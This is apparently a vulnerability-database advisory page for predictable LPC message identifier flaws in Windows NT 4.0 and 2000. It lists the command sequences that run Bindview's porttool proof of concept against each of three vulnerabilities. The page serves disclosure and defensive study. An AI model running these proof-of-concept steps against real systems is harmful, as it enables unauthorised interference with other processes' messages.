• News
• Infocus
• Foundations
• Microsoft
• Unix
• IDS
• Incidents
• Virus
• Pen-Test
• Firewalls
• Columnists
• Mailing Lists
• Newsletters
• Bugtraq
• Focus on IDS
• Focus on Linux
• Focus on Microsoft
• Forensics
• Pen-test
• Security Basics
• Vuln Dev
• Vulnerabilities
• Jobs
• Job Opportunities
• Resumes
• Job Seekers
• Employers
• RSS
• News
• Vulns
• Product Search

• info
• discussion
• exploit
• solution
• references

Microsoft Windows NT 4.0 / 2000 Predictable LPC Message Identifier Multiple Vulnerabilities

Bindview's Razor Team has provided a proof-of-concept tool (porttool.zip) to demonstrate the vulnerabilities that exist in Microsoft NT's implementation of LPC. The following commands correspond with the specified vulnerabilities detailed under the 'Discussion' tab:

Vulnerability #1:

start porttool -s \BaseNamedObjects\Foo
start porttool -c \BaseNamedObjects\Foo
porttool -s1
(enter PID, TID, and MID printed by porttool -s)

Vulnerability #2:

start porttool -s5a \BaseNamedObjects\Foo
start porttool -c5a-1 \BaseNamedObjects\Foo
porttool -c5a-2 \BaseNamedObjects\Foo
(enter PID, TID, MID, CID from porttool -s5)

Vulnerability #3:

start porttool -s5b \BaseNamedObjects\Foo
start porttool -s5b-2 \BaseNamedObjects\Foo2
porttool -c5b \BaseNamedObjects\Foo \BaseNamedObjects\Foo2
(wait until MIDs wrap around)

start porttool -s \BaseNamedObjects\Foo3
porttool -c \BaseNamedObjects\Foo3

(in window for porttool -s5b)
Enter PID, TID, MID, CID from porttool -s

• /data/vulnerabilities/exploits/porttool.zip